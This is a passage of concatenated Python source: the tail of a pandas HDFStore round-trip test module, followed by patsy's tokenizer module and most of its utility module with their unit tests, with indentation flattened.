df = tm.makeDataFrame()
df.iloc[:10].to_hdf(path, "df", append=True)
df.iloc[10:].to_hdf(path, "df", append=True, format="table")
tm.assert_frame_equal(read_hdf(path, "df"), df)
# append to False
df.iloc[:10].to_hdf(path, "df", append=False, format="table")
df.iloc[10:].to_hdf(path, "df", append=True)
tm.assert_frame_equal(read_hdf(path, "df"), df)
with ensure_clean_path(setup_path) as path:
df = tm.makeDataFrame()
df.to_hdf(path, "df", append=False, format="fixed")
tm.assert_frame_equal(read_hdf(path, "df"), df)
df.to_hdf(path, "df", append=False, format="f")
tm.assert_frame_equal(read_hdf(path, "df"), df)
df.to_hdf(path, "df", append=False)
tm.assert_frame_equal(read_hdf(path, "df"), df)
df.to_hdf(path, "df")
tm.assert_frame_equal(read_hdf(path, "df"), df)
with ensure_clean_store(setup_path) as store:
df = tm.makeDataFrame()
_maybe_remove(store, "df")
store.append("df", df.iloc[:10], append=True, format="table")
store.append("df", df.iloc[10:], append=True, format="table")
tm.assert_frame_equal(store.select("df"), df)
# append to False
_maybe_remove(store, "df")
store.append("df", df.iloc[:10], append=False, format="table")
store.append("df", df.iloc[10:], append=True, format="table")
tm.assert_frame_equal(store.select("df"), df)
# formats
_maybe_remove(store, "df")
store.append("df", df.iloc[:10], append=False, format="table")
store.append("df", df.iloc[10:], append=True, format="table")
tm.assert_frame_equal(store.select("df"), df)
_maybe_remove(store, "df")
store.append("df", df.iloc[:10], append=False, format="table")
store.append("df", df.iloc[10:], append=True, format=None)
tm.assert_frame_equal(store.select("df"), df)
with ensure_clean_path(setup_path) as path:
# Invalid.
df = tm.makeDataFrame()
msg = "Can only append to Tables"
with pytest.raises(ValueError, match=msg):
df.to_hdf(path, "df", append=True, format="f")
with pytest.raises(ValueError, match=msg):
df.to_hdf(path, "df", append=True, format="fixed")
msg = r"invalid HDFStore format specified \[foo\]"
with pytest.raises(TypeError, match=msg):
df.to_hdf(path, "df", append=True, format="foo")
with pytest.raises(TypeError, match=msg):
df.to_hdf(path, "df", append=False, format="foo")
# File path doesn't exist
path = ""
msg = f"File {path} does not exist"
with pytest.raises(FileNotFoundError, match=msg):
read_hdf(path, "df")
def test_get(setup_path):
with ensure_clean_store(setup_path) as store:
store["a"] = tm.makeTimeSeries()
left = store.get("a")
right = store["a"]
tm.assert_series_equal(left, right)
left = store.get("/a")
right = store["/a"]
tm.assert_series_equal(left, right)
with pytest.raises(KeyError, match="'No object named b in the file'"):
store.get("b")
def test_put_integer(setup_path):
# non-date, non-string index
df = DataFrame(np.random.randn(50, 100))
_check_roundtrip(df, tm.assert_frame_equal, setup_path)
def test_table_values_dtypes_roundtrip(setup_path):
with ensure_clean_store(setup_path) as store:
df1 = DataFrame({"a": [1, 2, 3]}, dtype="f8")
store.append("df_f8", df1)
tm.assert_series_equal(df1.dtypes, store["df_f8"].dtypes)
df2 = DataFrame({"a": [1, 2, 3]}, dtype="i8")
store.append("df_i8", df2)
tm.assert_series_equal(df2.dtypes, store["df_i8"].dtypes)
# incompatible dtype
msg = re.escape(
"invalid combination of [values_axes] on appending data "
"[name->values_block_0,cname->values_block_0,"
"dtype->float64,kind->float,shape->(1, 3)] vs "
"current table [name->values_block_0,"
"cname->values_block_0,dtype->int64,kind->integer,"
"shape->None]"
)
with pytest.raises(ValueError, match=msg):
store.append("df_i8", df1)
# check creation/storage/retrieval of float32 (a bit hacky to
# actually create them thought)
df1 = DataFrame(np.array([[1], [2], [3]], dtype="f4"), columns=["A"])
store.append("df_f4", df1)
tm.assert_series_equal(df1.dtypes, store["df_f4"].dtypes)
assert df1.dtypes[0] == "float32"
# check with mixed dtypes
df1 = DataFrame(
{
c: Series(np.random.randint(5), dtype=c)
for c in ["float32", "float64", "int32", "int64", "int16", "int8"]
}
)
df1["string"] = "foo"
df1["float322"] = 1.0
df1["float322"] = df1["float322"].astype("float32")
df1["bool"] = df1["float32"] > 0
df1["time1"] = Timestamp("20130101")
df1["time2"] = Timestamp("20130102")
store.append("df_mixed_dtypes1", df1)
result = store.select("df_mixed_dtypes1").dtypes.value_counts()
result.index = [str(i) for i in result.index]
expected = Series(
{
"float32": 2,
"float64": 1,
"int32": 1,
"bool": 1,
"int16": 1,
"int8": 1,
"int64": 1,
"object": 1,
"datetime64[ns]": 2,
}
)
result = result.sort_index()
expected = expected.sort_index()
tm.assert_series_equal(result, expected)
def test_series(setup_path):
s = tm.makeStringSeries()
_check_roundtrip(s, tm.assert_series_equal, path=setup_path)
ts = tm.makeTimeSeries()
_check_roundtrip(ts, tm.assert_series_equal, path=setup_path)
ts2 = Series(ts.index, Index(ts.index, dtype=object))
_check_roundtrip(ts2, tm.assert_series_equal, path=setup_path)
ts3 = Series(ts.values, Index(np.asarray(ts.index, dtype=object), dtype=object))
_check_roundtrip(
ts3, tm.assert_series_equal, path=setup_path, check_index_type=False
)
def test_float_index(setup_path):
# GH #454
index = np.random.randn(10)
s = Series(np.random.randn(10), index=index)
_check_roundtrip(s, tm.assert_series_equal, path=setup_path)
def test_tuple_index(setup_path):
# GH #492
col = np.arange(10)
idx = [(0.0, 1.0), (2.0, 3.0), (4.0, 5.0)]
data = np.random.randn(30).reshape((3, 10))
DF = DataFrame(data, index=idx, columns=col)
with catch_warnings(record=True):
simplefilter("ignore", pd.errors.PerformanceWarning)
_check_roundtrip(DF, tm.assert_frame_equal, path=setup_path)
@pytest.mark.filterwarnings("ignore::pandas.errors.PerformanceWarning")
def test_index_types(setup_path):
with catch_warnings(record=True):
values = np.random.randn(2)
func = lambda l, r: tm.assert_series_equal(l, r, check_index_type=True)
with catch_warnings(record=True):
ser = Series(values, [0, "y"])
_check_roundtrip(ser, func, path=setup_path)
with catch_warnings(record=True):
ser = Series(values, [datetime.datetime.today(), 0])
_check_roundtrip(ser, func, path=setup_path)
with catch_warnings(record=True):
ser = Series(values, ["y", 0])
_check_roundtrip(ser, func, path=setup_path)
with catch_warnings(record=True):
ser = Series(values, [datetime.date.today(), "a"])
_check_roundtrip(ser, func, path=setup_path)
with catch_warnings(record=True):
ser = Series(values, [0, "y"])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [datetime.datetime.today(), 0])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, ["y", 0])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [datetime.date.today(), "a"])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [1.23, "b"])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [1, 1.53])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(values, [1, 5])
_check_roundtrip(ser, func, path=setup_path)
ser = Series(
values, [datetime.datetime(2012, 1, 1), datetime.datetime(2012, 1, 2)]
)
_check_roundtrip(ser, func, path=setup_path)
def test_timeseries_preepoch(setup_path):
dr = bdate_range("1/1/1940", "1/1/1960")
ts = Series(np.random.randn(len(dr)), index=dr)
try:
_check_roundtrip(ts, tm.assert_series_equal, path=setup_path)
except OverflowError:
if is_platform_windows():
pytest.xfail("known failure on some windows platforms")
else:
raise
@pytest.mark.parametrize(
"compression", [False, pytest.param(True, marks=td.skip_if_windows)]
)
def test_frame(compression, setup_path):
df = tm.makeDataFrame()
# put in some random NAs
df.values[0, 0] = np.nan
df.values[5, 3] = np.nan
_check_roundtrip_table(
df, tm.assert_frame_equal, path=setup_path, compression=compression
)
_check_roundtrip(
df, tm.assert_frame_equal, path=setup_path, compression=compression
)
tdf = tm.makeTimeDataFrame()
_check_roundtrip(
tdf, tm.assert_frame_equal, path=setup_path, compression=compression
)
with ensure_clean_store(setup_path) as store:
# not consolidated
df["foo"] = np.random.randn(len(df))
store["df"] = df
recons = store["df"]
assert recons._mgr.is_consolidated()
# empty
_check_roundtrip(df[:0], tm.assert_frame_equal, path=setup_path)
def test_empty_series_frame(setup_path):
s0 = Series(dtype=object)
s1 = Series(name="myseries", dtype=object)
df0 = DataFrame()
df1 = DataFrame(index=["a", "b", "c"])
df2 = DataFrame(columns=["d", "e", "f"])
_check_roundtrip(s0, tm.assert_series_equal, path=setup_path)
_check_roundtrip(s1, tm.assert_series_equal, path=setup_path)
_check_roundtrip(df0, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(df1, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(df2, tm.assert_frame_equal, path=setup_path)
@pytest.mark.parametrize("dtype", [np.int64, np.float64, object, "m8[ns]", "M8[ns]"])
def test_empty_series(dtype, setup_path):
s = Series(dtype=dtype)
_check_roundtrip(s, tm.assert_series_equal, path=setup_path)
def test_can_serialize_dates(setup_path):
rng = [x.date() for x in bdate_range("1/1/2000", "1/30/2000")]
frame = DataFrame(np.random.randn(len(rng), 4), index=rng)
_check_roundtrip(frame, tm.assert_frame_equal, path=setup_path)
def test_store_hierarchical(setup_path, multiindex_dataframe_random_data):
frame = multiindex_dataframe_random_data
_check_roundtrip(frame, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(frame.T, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(frame["A"], tm.assert_series_equal, path=setup_path)
# check that the names are stored
with ensure_clean_store(setup_path) as store:
store["frame"] = frame
recons = store["frame"]
tm.assert_frame_equal(recons, frame)
@pytest.mark.parametrize(
"compression", [False, pytest.param(True, marks=td.skip_if_windows)]
)
def test_store_mixed(compression, setup_path):
def _make_one():
df = tm.makeDataFrame()
df["obj1"] = "foo"
df["obj2"] = "bar"
df["bool1"] = df["A"] > 0
df["bool2"] = df["B"] > 0
df["int1"] = 1
df["int2"] = 2
return df._consolidate()
df1 = _make_one()
df2 = _make_one()
_check_roundtrip(df1, tm.assert_frame_equal, path=setup_path)
_check_roundtrip(df2, tm.assert_frame_equal, path=setup_path)
with ensure_clean_store(setup_path) as store:
store["obj"] = df1
tm.assert_frame_equal(store["obj"], df1)
store["obj"] = df2
tm.assert_frame_equal(store["obj"], df2)
# check that can store Series of all of these types
_check_roundtrip(
df1["obj1"],
tm.assert_series_equal,
path=setup_path,
compression=compression,
)
_check_roundtrip(
df1["bool1"],
tm.assert_series_equal,
path=setup_path,
compression=compression,
)
_check_roundtrip(
df1["int1"],
tm.assert_series_equal,
path=setup_path,
compression=compression,
)
def _check_roundtrip(obj, comparator, path, compression=False, **kwargs):
options = {}
if compression:
options["complib"] = _default_compressor
with ensure_clean_store(path, "w", **options) as store:
store["obj"] = obj
retrieved = store["obj"]
comparator(retrieved, obj, **kwargs)
def _check_double_roundtrip(self, obj, comparator, path, compression=False, **kwargs):
options = {}
if compression:
options["complib"] = compression or _default_compressor
with ensure_clean_store(path, "w", **options) as store:
store["obj"] = obj
retrieved = store["obj"]
comparator(retrieved, obj, **kwargs)
store["obj"] = retrieved
again = store["obj"]
comparator(again, obj, **kwargs)
def _check_roundtrip_table(obj, comparator, path, compression=False):
options = {}
if compression:
options["complib"] = _default_compressor
with ensure_clean_store(path, "w", **options) as store:
store.put("obj", obj, format="table")
retrieved = store["obj"]
comparator(retrieved, obj)
def test_unicode_index(setup_path):
unicode_values = ["\u03c3", "\u03c3\u03c3"]
# PerformanceWarning
with catch_warnings(record=True):
simplefilter("ignore", pd.errors.PerformanceWarning)
s = Series(np.random.randn(len(unicode_values)), unicode_values)
_check_roundtrip(s, tm.assert_series_equal, path=setup_path)
def test_unicode_longer_encoded(setup_path):
# GH 11234
char = "\u0394"
df = DataFrame({"A": [char]})
with ensure_clean_store(setup_path) as store:
store.put("df", df, format="table", encoding="utf-8")
result = store.get("df")
tm.assert_frame_equal(result, df)
df = DataFrame({"A": ["a", char], "B": ["b", "b"]})
with ensure_clean_store(setup_path) as store:
store.put("df", df, format="table", encoding="utf-8")
result = store.get("df")
tm.assert_frame_equal(result, df)
def test_store_datetime_mixed(setup_path):
df = DataFrame({"a": [1, 2, 3], "b": [1.0, 2.0, 3.0], "c": ["a", "b", "c"]})
ts = tm.makeTimeSeries()
df["d"] = ts.index[:3]
_check_roundtrip(df, tm.assert_frame_equal, path=setup_path)
def test_round_trip_equals(setup_path):
# GH 9330
df = DataFrame({"B": [1, 2], "A": ["x", "y"]})
with ensure_clean_path(setup_path) as path:
df.to_hdf(path, "df", format="table")
other = read_hdf(path, "df")
tm.assert_frame_equal(df, other)
assert df.equals(other)
assert other.equals(df)
```
#### File: site-packages/patsy/tokens.py
```python
import tokenize
from six.moves import cStringIO as StringIO
from patsy import PatsyError
from patsy.origin import Origin
__all__ = ["python_tokenize", "pretty_untokenize",
"normalize_token_spacing"]
# A convenience wrapper around tokenize.generate_tokens. yields tuples
# (tokenize type, token string, origin object)
def python_tokenize(code):
# Since formulas can only contain Python expressions, and Python
# expressions cannot meaningfully contain newlines, we'll just remove all
# the newlines up front to avoid any complications:
code = code.replace("\n", " ").strip()
it = tokenize.generate_tokens(StringIO(code).readline)
try:
for (pytype, string, (_, start), (_, end), code) in it:
if pytype == tokenize.ENDMARKER:
break
origin = Origin(code, start, end)
assert pytype != tokenize.NL
if pytype == tokenize.NEWLINE:
assert string == ""
continue
if pytype == tokenize.ERRORTOKEN:
raise PatsyError("error tokenizing input "
"(maybe an unclosed string?)",
origin)
if pytype == tokenize.COMMENT:
raise PatsyError("comments are not allowed", origin)
yield (pytype, string, origin)
else: # pragma: no cover
raise ValueError("stream ended without ENDMARKER?!?")
except tokenize.TokenError as e:
# TokenError is raised iff the tokenizer thinks that there is
# some sort of multi-line construct in progress (e.g., an
# unclosed parentheses, which in Python lets a virtual line
# continue past the end of the physical line), and it hits the
# end of the source text. We have our own error handling for
# such cases, so just treat this as an end-of-stream.
#
# Just in case someone adds some other error case:
assert e.args[0].startswith("EOF in multi-line")
return
def test_python_tokenize():
code = "a + (foo * -1)"
tokens = list(python_tokenize(code))
expected = [(tokenize.NAME, "a", Origin(code, 0, 1)),
(tokenize.OP, "+", Origin(code, 2, 3)),
(tokenize.OP, "(", Origin(code, 4, 5)),
(tokenize.NAME, "foo", Origin(code, 5, 8)),
(tokenize.OP, "*", Origin(code, 9, 10)),
(tokenize.OP, "-", Origin(code, 11, 12)),
(tokenize.NUMBER, "1", Origin(code, 12, 13)),
(tokenize.OP, ")", Origin(code, 13, 14))]
assert tokens == expected
code2 = "a + (b"
tokens2 = list(python_tokenize(code2))
expected2 = [(tokenize.NAME, "a", Origin(code2, 0, 1)),
(tokenize.OP, "+", Origin(code2, 2, 3)),
(tokenize.OP, "(", Origin(code2, 4, 5)),
(tokenize.NAME, "b", Origin(code2, 5, 6))]
assert tokens2 == expected2
import pytest
pytest.raises(PatsyError, list, python_tokenize("a b # c"))
import pytest
pytest.raises(PatsyError, list, python_tokenize("a b \"c"))
_python_space_both = (list("+-*/%&^|<>")
+ ["==", "<>", "!=", "<=", ">=",
"<<", ">>", "**", "//"])
_python_space_before = (_python_space_both
+ ["!", "~"])
_python_space_after = (_python_space_both
+ [",", ":"])
def pretty_untokenize(typed_tokens):
text = []
prev_was_space_delim = False
prev_wants_space = False
prev_was_open_paren_or_comma = False
prev_was_object_like = False
brackets = []
for token_type, token in typed_tokens:
assert token_type not in (tokenize.INDENT, tokenize.DEDENT,
tokenize.NL)
if token_type == tokenize.NEWLINE:
continue
if token_type == tokenize.ENDMARKER:
continue
if token_type in (tokenize.NAME, tokenize.NUMBER, tokenize.STRING):
if prev_wants_space or prev_was_space_delim:
text.append(" ")
text.append(token)
prev_wants_space = False
prev_was_space_delim = True
else:
if token in ("(", "[", "{"):
brackets.append(token)
elif brackets and token in (")", "]", "}"):
brackets.pop()
this_wants_space_before = (token in _python_space_before)
this_wants_space_after = (token in _python_space_after)
# Special case for slice syntax: foo[:10]
# Otherwise ":" is spaced after, like: "{1: ...}", "if a: ..."
if token == ":" and brackets and brackets[-1] == "[":
this_wants_space_after = False
# Special case for foo(*args), foo(a, *args):
if token in ("*", "**") and prev_was_open_paren_or_comma:
this_wants_space_before = False
this_wants_space_after = False
# Special case for "a = foo(b=1)":
if token == "=" and not brackets:
this_wants_space_before = True
this_wants_space_after = True
# Special case for unary -, +. Our heuristic is that if we see the
# + or - after something that looks like an object (a NAME,
# NUMBER, STRING, or close paren) then it is probably binary,
# otherwise it is probably unary.
if token in ("+", "-") and not prev_was_object_like:
this_wants_space_before = False
this_wants_space_after = False
if prev_wants_space or this_wants_space_before:
text.append(" ")
text.append(token)
prev_wants_space = this_wants_space_after
prev_was_space_delim = False
if (token_type in (tokenize.NAME, tokenize.NUMBER, tokenize.STRING)
or token == ")"):
prev_was_object_like = True
else:
prev_was_object_like = False
prev_was_open_paren_or_comma = token in ("(", ",")
return "".join(text)
def normalize_token_spacing(code):
tokens = [(t[0], t[1])
for t in tokenize.generate_tokens(StringIO(code).readline)]
return pretty_untokenize(tokens)
def test_pretty_untokenize_and_normalize_token_spacing():
assert normalize_token_spacing("1 + 1") == "1 + 1"
assert normalize_token_spacing("1+1") == "1 + 1"
assert normalize_token_spacing("1*(2+3**2)") == "1 * (2 + 3 ** 2)"
assert normalize_token_spacing("a and b") == "a and b"
assert normalize_token_spacing("foo(a=bar.baz[1:])") == "foo(a=bar.baz[1:])"
assert normalize_token_spacing("""{"hi":foo[:]}""") == """{"hi": foo[:]}"""
assert normalize_token_spacing("""'a' "b" 'c'""") == """'a' "b" 'c'"""
assert normalize_token_spacing('"""a""" is 1 or 2==3') == '"""a""" is 1 or 2 == 3'
assert normalize_token_spacing("foo ( * args )") == "foo(*args)"
assert normalize_token_spacing("foo ( a * args )") == "foo(a * args)"
assert normalize_token_spacing("foo ( ** args )") == "foo(**args)"
assert normalize_token_spacing("foo ( a ** args )") == "foo(a ** args)"
assert normalize_token_spacing("foo (1, * args )") == "foo(1, *args)"
assert normalize_token_spacing("foo (1, a * args )") == "foo(1, a * args)"
assert normalize_token_spacing("foo (1, ** args )") == "foo(1, **args)"
assert normalize_token_spacing("foo (1, a ** args )") == "foo(1, a ** args)"
assert normalize_token_spacing("a=foo(b = 1)") == "a = foo(b=1)"
assert normalize_token_spacing("foo(+ 10, bar = - 1)") == "foo(+10, bar=-1)"
assert normalize_token_spacing("1 + +10 + -1 - 5") == "1 + +10 + -1 - 5"
```
#### File: site-packages/patsy/util.py
```python
__all__ = ["atleast_2d_column_default", "uniqueify_list",
"widest_float", "widest_complex", "wide_dtype_for", "widen",
"repr_pretty_delegate", "repr_pretty_impl",
"SortAnythingKey", "safe_scalar_isnan", "safe_isnan",
"iterable",
"have_pandas",
"have_pandas_categorical",
"have_pandas_categorical_dtype",
"pandas_Categorical_from_codes",
"pandas_Categorical_categories",
"pandas_Categorical_codes",
"safe_is_pandas_categorical_dtype",
"safe_is_pandas_categorical",
"safe_issubdtype",
"no_pickling",
"assert_no_pickling",
"safe_string_eq",
]
import sys
import numpy as np
import six
from six.moves import cStringIO as StringIO
from .compat import optional_dep_ok
try:
import pandas
except ImportError:
have_pandas = False
else:
have_pandas = True
# Pandas versions < 0.9.0 don't have Categorical
# Can drop this guard whenever we drop support for such older versions of
# pandas.
have_pandas_categorical = (have_pandas and hasattr(pandas, "Categorical"))
if not have_pandas:
have_pandas_categorical_dtype = False
_pandas_is_categorical_dtype = None
else:
if hasattr(pandas, "api"):
# This is available starting in pandas v0.19.0
have_pandas_categorical_dtype = True
_pandas_is_categorical_dtype = pandas.api.types.is_categorical_dtype
else:
# This is needed for pandas v0.18.0 and earlier
_pandas_is_categorical_dtype = getattr(pandas.core.common,
"is_categorical_dtype", None)
have_pandas_categorical_dtype = (_pandas_is_categorical_dtype
is not None)
# Passes through Series and DataFrames, call np.asarray() on everything else
def asarray_or_pandas(a, copy=False, dtype=None, subok=False):
if have_pandas:
if isinstance(a, (pandas.Series, pandas.DataFrame)):
# The .name attribute on Series is discarded when passing through
# the constructor:
# https://github.com/pydata/pandas/issues/1578
extra_args = {}
if hasattr(a, "name"):
extra_args["name"] = a.name
return a.__class__(a, copy=copy, dtype=dtype, **extra_args)
return np.array(a, copy=copy, dtype=dtype, subok=subok)
def test_asarray_or_pandas():
import warnings
assert type(asarray_or_pandas([1, 2, 3])) is np.ndarray
with warnings.catch_warnings() as w:
warnings.filterwarnings('ignore', 'the matrix subclass',
PendingDeprecationWarning)
assert type(asarray_or_pandas(np.matrix([[1, 2, 3]]))) is np.ndarray
assert type(asarray_or_pandas(
np.matrix([[1, 2, 3]]), subok=True)) is np.matrix
assert w is None
a = np.array([1, 2, 3])
assert asarray_or_pandas(a) is a
a_copy = asarray_or_pandas(a, copy=True)
assert np.array_equal(a, a_copy)
a_copy[0] = 100
assert not np.array_equal(a, a_copy)
assert np.allclose(asarray_or_pandas([1, 2, 3], dtype=float),
[1.0, 2.0, 3.0])
assert asarray_or_pandas([1, 2, 3], dtype=float).dtype == np.dtype(float)
a_view = asarray_or_pandas(a, dtype=a.dtype)
a_view[0] = 99
assert a[0] == 99
global have_pandas
if have_pandas:
s = pandas.Series([1, 2, 3], name="A", index=[10, 20, 30])
s_view1 = asarray_or_pandas(s)
assert s_view1.name == "A"
assert np.array_equal(s_view1.index, [10, 20, 30])
s_view1[10] = 101
assert s[10] == 101
s_copy = asarray_or_pandas(s, copy=True)
assert s_copy.name == "A"
assert np.array_equal(s_copy.index, [10, 20, 30])
assert np.array_equal(s_copy, s)
s_copy[10] = 100
assert not np.array_equal(s_copy, s)
assert asarray_or_pandas(s, dtype=float).dtype == np.dtype(float)
s_view2 = asarray_or_pandas(s, dtype=s.dtype)
assert s_view2.name == "A"
assert np.array_equal(s_view2.index, [10, 20, 30])
s_view2[10] = 99
assert s[10] == 99
df = pandas.DataFrame([[1, 2, 3]],
columns=["A", "B", "C"],
index=[10])
df_view1 = asarray_or_pandas(df)
df_view1.loc[10, "A"] = 101
assert np.array_equal(df_view1.columns, ["A", "B", "C"])
assert np.array_equal(df_view1.index, [10])
assert df.loc[10, "A"] == 101
df_copy = asarray_or_pandas(df, copy=True)
assert np.array_equal(df_copy, df)
assert np.array_equal(df_copy.columns, ["A", "B", "C"])
assert np.array_equal(df_copy.index, [10])
df_copy.loc[10, "A"] = 100
assert not np.array_equal(df_copy, df)
df_converted = asarray_or_pandas(df, dtype=float)
assert df_converted["A"].dtype == np.dtype(float)
assert np.allclose(df_converted, df)
assert np.array_equal(df_converted.columns, ["A", "B", "C"])
assert np.array_equal(df_converted.index, [10])
df_view2 = asarray_or_pandas(df, dtype=df["A"].dtype)
assert np.array_equal(df_view2.columns, ["A", "B", "C"])
assert np.array_equal(df_view2.index, [10])
# This actually makes a copy, not a view, because of a pandas bug:
# https://github.com/pydata/pandas/issues/1572
assert np.array_equal(df, df_view2)
# df_view2[0][0] = 99
# assert df[0][0] == 99
had_pandas = have_pandas
try:
have_pandas = False
assert (type(asarray_or_pandas(pandas.Series([1, 2, 3])))
is np.ndarray)
assert (type(asarray_or_pandas(pandas.DataFrame([[1, 2, 3]])))
is np.ndarray)
finally:
have_pandas = had_pandas
# Like np.atleast_2d, but this converts lower-dimensional arrays into columns,
# instead of rows. It also converts ndarray subclasses into basic ndarrays,
# which makes it easier to guarantee correctness. However, there are many
# places in the code where we want to preserve pandas indexing information if
# present, so there is also an option
def atleast_2d_column_default(a, preserve_pandas=False):
if preserve_pandas and have_pandas:
if isinstance(a, pandas.Series):
return pandas.DataFrame(a)
elif isinstance(a, pandas.DataFrame):
return a
# fall through
a = np.asarray(a)
a = np.atleast_1d(a)
if a.ndim <= 1:
a = a.reshape((-1, 1))
assert a.ndim >= 2
return a
def test_atleast_2d_column_default():
import warnings
assert np.all(atleast_2d_column_default([1, 2, 3]) == [[1], [2], [3]])
assert atleast_2d_column_default(1).shape == (1, 1)
assert atleast_2d_column_default([1]).shape == (1, 1)
assert atleast_2d_column_default([[1]]).shape == (1, 1)
assert atleast_2d_column_default([[[1]]]).shape == (1, 1, 1)
assert atleast_2d_column_default([1, 2, 3]).shape == (3, 1)
assert atleast_2d_column_default([[1], [2], [3]]).shape == (3, 1)
with warnings.catch_warnings() as w:
warnings.filterwarnings('ignore', 'the matrix subclass',
PendingDeprecationWarning)
assert type(atleast_2d_column_default(np.matrix(1))) == np.ndarray
assert w is None
global have_pandas
if have_pandas:
assert (type(atleast_2d_column_default(pandas.Series([1, 2])))
== np.ndarray)
assert (type(atleast_2d_column_default(pandas.DataFrame([[1], [2]])))
== np.ndarray)
assert (type(atleast_2d_column_default(pandas.Series([1, 2]),
preserve_pandas=True))
== pandas.DataFrame)
assert (type(atleast_2d_column_default(pandas.DataFrame([[1], [2]]),
preserve_pandas=True))
== pandas.DataFrame)
s = pandas.Series([10, 11, 12], name="hi", index=["a", "b", "c"])
df = atleast_2d_column_default(s, preserve_pandas=True)
assert isinstance(df, pandas.DataFrame)
assert np.all(df.columns == ["hi"])
assert np.all(df.index == ["a", "b", "c"])
with warnings.catch_warnings() as w:
warnings.filterwarnings('ignore', 'the matrix subclass',
PendingDeprecationWarning)
assert (type(atleast_2d_column_default(np.matrix(1),
preserve_pandas=True))
== np.ndarray)
assert w is None
assert (type(atleast_2d_column_default([1, 2, 3], preserve_pandas=True))
== np.ndarray)
if have_pandas:
had_pandas = have_pandas
try:
have_pandas = False
assert (type(atleast_2d_column_default(pandas.Series([1, 2]),
preserve_pandas=True))
== np.ndarray)
assert (type(atleast_2d_column_default(pandas.DataFrame([[1], [2]]),
preserve_pandas=True))
== np.ndarray)
finally:
have_pandas = had_pandas
# A version of .reshape() that knows how to down-convert a 1-column
# pandas.DataFrame into a pandas.Series. Useful for code that wants to be
# agnostic between 1d and 2d data, with the pattern:
# new_a = atleast_2d_column_default(a, preserve_pandas=True)
# # do stuff to new_a, which can assume it's always 2 dimensional
# return pandas_friendly_reshape(new_a, a.shape)
def pandas_friendly_reshape(a, new_shape):
if not have_pandas:
return a.reshape(new_shape)
if not isinstance(a, pandas.DataFrame):
return a.reshape(new_shape)
# we have a DataFrame. Only supported reshapes are no-op, and
# single-column DataFrame -> Series.
if new_shape == a.shape:
return a
if len(new_shape) == 1 and a.shape[1] == 1:
if new_shape[0] != a.shape[0]:
raise ValueError("arrays have incompatible sizes")
return a[a.columns[0]]
raise ValueError("cannot reshape a DataFrame with shape %s to shape %s"
% (a.shape, new_shape))
def test_pandas_friendly_reshape():
import pytest
global have_pandas
assert np.allclose(pandas_friendly_reshape(np.arange(10).reshape(5, 2),
(2, 5)),
np.arange(10).reshape(2, 5))
if have_pandas:
df = pandas.DataFrame({"x": [1, 2, 3]}, index=["a", "b", "c"])
noop = pandas_friendly_reshape(df, (3, 1))
assert isinstance(noop, pandas.DataFrame)
assert np.array_equal(noop.index, ["a", "b", "c"])
assert np.array_equal(noop.columns, ["x"])
squozen = pandas_friendly_reshape(df, (3,))
assert isinstance(squozen, pandas.Series)
assert np.array_equal(squozen.index, ["a", "b", "c"])
assert squozen.name == "x"
pytest.raises(ValueError, pandas_friendly_reshape, df, (4,))
pytest.raises(ValueError, pandas_friendly_reshape, df, (1, 3))
pytest.raises(ValueError, pandas_friendly_reshape, df, (3, 3))
had_pandas = have_pandas
try:
have_pandas = False
# this will try to do a reshape directly, and DataFrames *have* no
# reshape method
pytest.raises(AttributeError, pandas_friendly_reshape, df, (3,))
finally:
have_pandas = had_pandas
def uniqueify_list(seq):
seq_new = []
seen = set()
for obj in seq:
if obj not in seen:
seq_new.append(obj)
seen.add(obj)
return seq_new
def test_to_uniqueify_list():
assert uniqueify_list([1, 2, 3]) == [1, 2, 3]
assert uniqueify_list([1, 3, 3, 2, 3, 1]) == [1, 3, 2]
assert uniqueify_list([3, 2, 1, 4, 1, 2, 3]) == [3, 2, 1, 4]
for float_type in ("float128", "float96", "float64"):
if hasattr(np, float_type):
widest_float = getattr(np, float_type)
break
else: # pragma: no cover
assert False
for complex_type in ("complex256", "complex196", "complex128"):
if hasattr(np, complex_type):
widest_complex = getattr(np, complex_type)
break
else: # pragma: no cover
assert False
def wide_dtype_for(arr):
arr = np.asarray(arr)
if (safe_issubdtype(arr.dtype, np.integer)
or safe_issubdtype(arr.dtype, np.floating)):
return widest_float
elif safe_issubdtype(arr.dtype, np.complexfloating):
return widest_complex
raise ValueError("cannot widen a non-numeric type %r" % (arr.dtype,))
def widen(arr):
return np.asarray(arr, dtype=wide_dtype_for(arr))
def test_wide_dtype_for_and_widen():
assert np.allclose(widen([1, 2, 3]), [1, 2, 3])
assert widen([1, 2, 3]).dtype == widest_float
assert np.allclose(widen([1.0, 2.0, 3.0]), [1, 2, 3])
assert widen([1.0, 2.0, 3.0]).dtype == widest_float
assert np.allclose(widen([1+0j, 2, 3]), [1, 2, 3])
assert widen([1+0j, 2, 3]).dtype == widest_complex
import pytest
pytest.raises(ValueError, widen, ["hi"])
class PushbackAdapter(object):
def __init__(self, it):
self._it = it
self._pushed = []
def __iter__(self):
return self
def push_back(self, obj):
self._pushed.append(obj)
def next(self):
if self._pushed:
return self._pushed.pop()
else:
# May raise StopIteration
return six.advance_iterator(self._it)
__next__ = next
def peek(self):
try:
obj = six.advance_iterator(self)
except StopIteration:
raise ValueError("no more data")
self.push_back(obj)
return obj
def has_more(self):
try:
self.peek()
except ValueError:
return False
else:
return True
def test_PushbackAdapter():
it = PushbackAdapter(iter([1, 2, 3, 4]))
assert it.has_more()
assert six.advance_iterator(it) == 1
it.push_back(0)
assert six.advance_iterator(it) == 0
assert six.advance_iterator(it) == 2
assert it.peek() == 3
it.push_back(10)
assert it.peek() == 10
it.push_back(20)
assert it.peek() == 20
assert it.has_more()
assert list(it) == [20, 10, 3, 4]
assert not it.has_more()
# The IPython pretty-printer gives very nice output that is difficult to get
# otherwise, e.g., look how much more readable this is than if it were all
# smooshed onto one line:
#
# ModelDesc(input_code='y ~ x*asdf',
# lhs_terms=[Term([EvalFactor('y')])],
# rhs_terms=[Term([]),
# Term([EvalFactor('x')]),
# Term([EvalFactor('asdf')]),
# Term([EvalFactor('x'), EvalFactor('asdf')])],
# )
#
# But, we don't want to assume it always exists; nor do we want to be
